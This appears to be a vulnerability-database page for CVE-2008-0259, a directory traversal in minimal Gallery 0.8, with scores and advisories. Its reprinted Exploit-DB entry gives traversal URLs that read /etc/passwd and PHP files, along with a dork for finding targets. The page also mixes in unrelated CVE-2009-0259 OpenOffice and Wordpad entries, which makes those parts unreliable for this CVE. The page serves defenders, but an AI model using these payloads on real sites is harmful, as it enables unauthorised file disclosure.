CVE-2008-0259
published 2008-01-15CVE-2008-0259: Multiple directory traversal vulnerabilities in _mg/php/mg_thumbs.php in minimal Gallery 0.8 allow remote attackers to read arbitrary files via a .. (dot dot)…
PriorityP432medium6.4CVSS 2.0
AVNACLAuNCPIPAN
EXPLOIT
EPSS
2.26%
80.8th percentile
Multiple directory traversal vulnerabilities in _mg/php/mg_thumbs.php in minimal Gallery 0.8 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) thumbcat and (2) thumb parameters.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| minimal_design | minimal_gallery | — | — |
CVSS provenance
nvdv2.06.4MEDIUMAV:N/AC:L/Au:N/C:P/I:P/A:N
vendor_redhat9.3CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-9c9v-6xrr-w9cv: Multiple directory traversal vulnerabilities in _mg/php/mg_thumbs
ghsa_unreviewed·2022-05-01
CVE-2008-0259 [MEDIUM] CWE-22 GHSA-9c9v-6xrr-w9cv: Multiple directory traversal vulnerabilities in _mg/php/mg_thumbs
Multiple directory traversal vulnerabilities in _mg/php/mg_thumbs.php in minimal Gallery 0.8 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) thumbcat and (2) thumb parameters.
Red Hat
openoffice.org: text converter memory corruption via a crafted (1) .doc, (2) .wri, or (3) .rtf Word97 file
vendor_redhat·2008-12-09·CVSS 9.3
CVE-2009-0259 [CRITICAL] openoffice.org: text converter memory corruption via a crafted (1) .doc, (2) .wri, or (3) .rtf Word97 file
openoffice.org: text converter memory corruption via a crafted (1) .doc, (2) .wri, or (3) .rtf Word97 file
The Word processor in OpenOffice.org 1.1.2 through 1.1.5 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted (1) .doc, (2) .wri, or (3) .rtf Word 97 file that triggers memory corruption, as exploited in the wild in December 2008, as demonstrated by 2008-crash.doc.rar, and a similar issue to CVE-2008-4841.
Statement: This issue can only result in an OpenOffice.org crash, not allowing arbitrary code execution. Red Hat does not consider a crash of a client application such as OpenOffice.org to be a security issue.
No detection rules found.
Exploit-DB
Microsoft Windows Wordpad - '.doc' File Local Denial of Service (PoC)
exploitdb·2008-09-25
CVE-2009-0259 Microsoft Windows Wordpad - '.doc' File Local Denial of Service (PoC)
Microsoft Windows Wordpad - '.doc' File Local Denial of Service (PoC)
---
MS Windows Wordpad .doc File Local Denial of Service PoC
author: securfrog
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6560.rar (2008-crash.doc.rar)
# milw0rm.com [2008-09-25]
Exploit-DB
minimal Gallery 0.8 - Remote File Disclosure
exploitdb·2008-01-13
CVE-2008-0260 minimal Gallery 0.8 - Remote File Disclosure
minimal Gallery 0.8 - Remote File Disclosure
---
# Script : minimal Gallery 0.8
# Download : http://minimaldesign.net/downloads/projects/minimal-gallery
# BUG : Remote File Disclosure Vulnerability
# Dork : powered by minimal Gallery 0.8
## Vulnerable CODE :
~~~~~~~~~ /_mg/php/mg_thumbs.php ~~~~~~~~~~~~~~~~~
readfile("../$thumbs_dir/$thumbcat$thumb");
the variables thumbcat & thumb are defined in page mg_thumbs.php like that :
$thumbcat = $_GET['thumbcat'];
$thumb = $_GET['thumb'];
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Exploit :
[Target.il]/[Path_mGallery]/_mg/php/mg_thumbs.php?thumbcat=../../../../../../etc/passwd
[Target.il]/[Path_mGallery]/_mg/php/mg_thumbs.php?thumbcat=../../../../../../[file].php
[Target.il]/[Path_mGallery]/_mg/php/mg_thumbs.php?thumb=../../../..
http://secunia.com/advisories/28391http://www.securityfocus.com/bid/27265https://exchange.xforce.ibmcloud.com/vulnerabilities/39649https://www.exploit-db.com/exploits/4902http://secunia.com/advisories/28391http://www.securityfocus.com/bid/27265https://exchange.xforce.ibmcloud.com/vulnerabilities/39649https://www.exploit-db.com/exploits/4902
2008-01-15
Published